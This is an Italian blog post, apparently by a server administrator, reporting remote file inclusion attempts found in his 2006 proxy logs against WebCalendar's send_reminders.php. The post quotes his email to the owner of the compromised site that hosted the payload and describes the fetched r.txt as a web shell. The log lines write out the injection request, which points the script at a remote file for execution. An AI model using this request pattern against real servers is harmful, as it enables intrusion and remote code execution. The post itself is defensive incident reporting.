Oggi fra i soliti tentativi di attacco via remote file inclusion trovati sul server mi è saltato all’occhio quello proveniente da un IP americano 72.29.76.125 che tentava di sfruttare il celeberrimo “buco” di webcalendar
Sep 12 07:15:16 fw1 pound: texilee.gruppoinfo.it 72.29.76.125 – – [12/Sep/2006:07:15:14 +0200] “GET /category//tools/send_reminders.php?includedir=http://www.samasgildae.it/screen/shot/r.txt? HTTP/1.1” 404 3374 “” “libwww-perl/5.805”
Sep 12 07:15:26 fw1 pound: texilee.gruppoinfo.it 72.29.76.125 – – [12/Sep/2006:07:15:25 +0200] “GET /category//tools/send_reminders.php?includedir=http://www.samasgildae.it/screen/shot/r.txt? HTTP/1.1” 404 3374 “” “libwww-perl/5.805″
Ci sono abituato e non me ne preoccupo (poi webcalendar non è nemmeno installato su questo server) , ma mi dispiace vedere che i portatori del malware abbiano sfruttato una macchina con dominio italiano per farlo. Ho pensato di contattare samasgildae.it per avvertirli, ecco il testo della mail:
” ciao, ho trovato la tua mail sul forum
http://www.samasgildae.it/forum/index.php
da stamattina uno stupido script lanciato sull host 72.29.76.125 cerca di sfruttare un baco nella web apps “web calendar” (che nemmeno ho installato…. ) cercando di iniettarmi un altrettanto stupido script perl
72.29.76.125 – – [12/Sep/2006:07:15:55 +0200] “GET /category//tools/send_reminders.php?includedir=http://www.samasgildae.it/screen/shot/r.txt? HTTP/1.1” 404 3374 “” “libwww-perl/5.805”
questo è parte del log del reverse proxy in stile “apache”
quello che ti chiedo è di eliminare il file
http://www.samasgildae.it/screen/shot/r.txt
grazie e ciao ”
Il file r.txt contiene tutto l’occorrente per amministrare la macchina, connettersi ad un dbms, spedire spam. Ottimo lavoro 1dt.w0lf
/* (c)oded by 1dt.w0lf /* RST/GHC http://rst.void.xxx , http://ghc.xxxx /* ANY MODIFIED REPUBLISHING IS RESTRICTED